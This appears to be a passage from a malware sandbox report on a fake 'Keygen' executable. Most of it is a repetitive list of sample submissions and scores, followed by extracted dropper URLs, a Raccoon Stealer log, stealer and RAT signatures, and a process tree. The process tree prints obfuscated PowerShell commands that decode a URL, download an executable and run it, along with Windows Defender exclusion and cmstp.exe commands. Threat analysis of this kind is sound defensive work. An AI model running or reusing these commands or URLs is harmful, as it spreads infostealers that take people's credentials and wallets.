Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

8

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

8

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    152s
  • max time network
    157s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (32).exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 04:02:39 GMT Bot_ID: 992575D9-3ACE-4400-98F7-F39D82F3369F_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: ELJKIHEZ - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (478 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 2 IoCs
  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 53 IoCs
  • Loads dropped DLL 52 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (32).exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (32).exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1404
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\4FF4.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (32).exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1832
      • C:\Users\Admin\AppData\Local\Temp\4FF4.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1640
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\4FF4.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1544
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1168
          • C:\Users\Public\gul.exe
            "C:\Users\Public\gul.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2580
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2744
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:2952
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 2952 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\072331517745343\\* & exit
                  8⤵
                    PID:2384
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 2952
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2308
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2820
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2152
              • C:\Users\Public\gul.exe
                "C:\Users\Public\gul.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                • Modifies system certificate store
                PID:2860
                • C:\Users\Admin\AppData\Local\Temp\Gnc2X0vFuC.exe
                  "C:\Users\Admin\AppData\Local\Temp\Gnc2X0vFuC.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2772
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                    "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\Gnc2X0vFuC.exe"'
                    8⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1216
                • C:\Users\Admin\AppData\Local\Temp\9LbdFUtYlQ.exe
                  "C:\Users\Admin\AppData\Local\Temp\9LbdFUtYlQ.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2984
                  • C:\Windows\SysWOW64\Notepad.exe
                    "C:\Windows\System32\Notepad.exe"
                    8⤵
                      PID:2176
                  • C:\Users\Admin\AppData\Local\Temp\6cG77ZLakh.exe
                    "C:\Users\Admin\AppData\Local\Temp\6cG77ZLakh.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of SetWindowsHookEx
                    PID:3000
                    • \??\c:\windows\SysWOW64\cmstp.exe
                      "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\ne3azr0v.inf
                      8⤵
                        PID:2332
                    • C:\Users\Admin\AppData\Local\Temp\EWoYpM0ceq.exe
                      "C:\Users\Admin\AppData\Local\Temp\EWoYpM0ceq.exe"
                      7⤵
                      • Executes dropped EXE
                      • Windows security modification
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2716
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" Get-MpPreference -verbose
                        8⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1896
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\gul.exe"
                      7⤵
                        PID:2088
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout /T 10 /NOBREAK
                          8⤵
                          • Delays execution with timeout.exe
                          PID:2240
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\4FF4.tmp\m1.hta"
                3⤵
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:1956
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:660
              • C:\Windows\SysWOW64\timeout.exe
                timeout 1
                3⤵
                • Delays execution with timeout.exe
                PID:1936
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\4FF4.tmp\b.hta"
                3⤵
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:1584
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
